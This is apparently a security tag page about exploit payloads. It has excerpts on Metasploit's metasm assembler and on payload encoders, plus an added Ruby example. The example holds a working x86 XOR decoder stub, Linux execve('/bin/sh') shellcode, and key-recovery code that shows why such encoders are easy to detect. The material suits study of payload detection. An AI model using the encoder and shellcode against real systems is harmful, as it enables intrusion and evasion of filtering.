payload

Thanks to Yoann GUILLOT and Julien TINNES, Metasploit 3.0 (the trunk version) includes integrated support for metasm, a 100% ruby assembler, disassembler, and linker. It currently supports x86 and MIPS, but support for many other architectures is in development. Using metasm, we've taken some steps to improve the framework's payload module interface. This improvement is designed to make it possible for payload modules to contain assembly rather than the typical large blob of pre-assembled machine code.
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, th
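The weakness the excerpt above describes, shown as an added example that is not code from the linked paper or from Metasploit: a single-byte XOR encoder wrapped around a hand-assembled x86 jmp/call/pop decoder stub, followed by the two ways an observer recovers the key. A signature match on the stub's fixed opcodes reads the key straight out of the immediate; if the stub is not recognised, one key byte leaves only 255 candidates to brute-force against a guessable payload opener. The stub layout, the byte offsets, and the sample payload (the common Linux/x86 execve("/bin/sh") shellcode) are this example's own choices.

```ruby
# Added example: single-byte XOR encoder with a hand-assembled x86 decoder
# stub, plus key recovery by stub signature and by brute force.

# Decoder stub, x86 (32-bit). nil marks the two bytes the encoder fills in.
STUB_TEMPLATE = [
  0xEB, 0x0D,                    # jmp short call_decoder
  0x5E,                          # decoder:  pop esi        ; esi -> encoded bytes
  0x31, 0xC9,                    #           xor ecx, ecx
  0xB1, nil,                     #           mov cl, <len>
  0x80, 0x36, nil,               # decode:   xor byte [esi], <key>
  0x46,                          #           inc esi
  0xE2, 0xFA,                    #           loop decode
  0xEB, 0x05,                    #           jmp short payload
  0xE8, 0xEE, 0xFF, 0xFF, 0xFF,  # call_decoder: call decoder
].freeze                         # payload:  <len> encoded bytes follow
LEN_OFFSET = 6                   # index of the "mov cl" immediate
KEY_OFFSET = 9                   # index of the "xor byte [esi]" immediate

# Constructed sample payload: the classic Linux/x86 execve("/bin/sh") shellcode.
SAMPLE_PAYLOAD = [
  0x31, 0xC0, 0x50, 0x68, 0x2F, 0x2F, 0x73, 0x68, 0x68, 0x2F, 0x62, 0x69,
  0x6E, 0x89, 0xE3, 0x50, 0x53, 0x89, 0xE1, 0xB0, 0x0B, 0xCD, 0x80,
].pack("C*")

# Pick a key that never XORs a payload byte to 0x00 (a NUL truncates the
# payload in many string-based injection vectors). Prefer the caller's key.
def choose_key(payload, preferred = 0x5A)
  ([preferred] + (1..255).to_a).find { |k| !payload.bytes.include?(k) }
end

# Decoder stub followed by the payload XORed with key.
def xor_encode(payload, key)
  raise ArgumentError, "payload must be 1..255 bytes" unless (1..255).cover?(payload.bytesize)
  raise ArgumentError, "key must be 1..255" unless (1..255).cover?(key)
  stub = STUB_TEMPLATE.dup
  stub[LEN_OFFSET] = payload.bytesize
  stub[KEY_OFFSET] = key
  stub.pack("C*") + payload.bytes.map { |b| b ^ key }.pack("C*")
end

# What a signature-based observer does: find the fixed opcode bytes of the
# stub anywhere in a blob and read len and key straight out of it.
def find_decoder(blob)
  bytes = blob.bytes
  (0..bytes.size - STUB_TEMPLATE.size).each do |off|
    hit = STUB_TEMPLATE.each_with_index.all? { |b, i| b.nil? || bytes[off + i] == b }
    return { offset: off, len: bytes[off + LEN_OFFSET], key: bytes[off + KEY_OFFSET] } if hit
  end
  nil
end

# Recover the plaintext payload from a blob using the key found in the stub.
def decode_with_stub(blob)
  info = find_decoder(blob)
  return nil unless info
  start = info[:offset] + STUB_TEMPLATE.size
  blob.byteslice(start, info[:len]).bytes.map { |b| b ^ info[:key] }.pack("C*")
end

# What a content-based observer does when the stub is not recognised: with
# one key byte there are only 255 candidates, so assume a likely payload
# opener (here "xor eax, eax") and test every key against it.
def guess_key(encoded, known_prefix = [0x31, 0xC0].pack("C*"))
  head = encoded.byteslice(0, known_prefix.bytesize).bytes
  (1..255).find { |k| head.map { |b| b ^ k }.pack("C*") == known_prefix }
end

if __FILE__ == $PROGRAM_NAME
  key  = choose_key(SAMPLE_PAYLOAD)
  blob = xor_encode(SAMPLE_PAYLOAD, key)
  encoded_part = blob.byteslice(STUB_TEMPLATE.size, SAMPLE_PAYLOAD.bytesize)
  puts "key used: 0x%02x, stub reveals: 0x%02x, brute force finds: 0x%02x" % [
    key, find_decoder(blob)[:key], guess_key(encoded_part)]
  puts "decoded payload matches: #{decode_with_stub(blob) == SAMPLE_PAYLOAD}"
end
```

Both recovery paths succeed on every blob this encoder emits, which is the point: a fixed decoder stub is a signature, and a key small enough to be recovered by exhaustive search offers no secrecy even if the stub were polymorphic.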
This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ...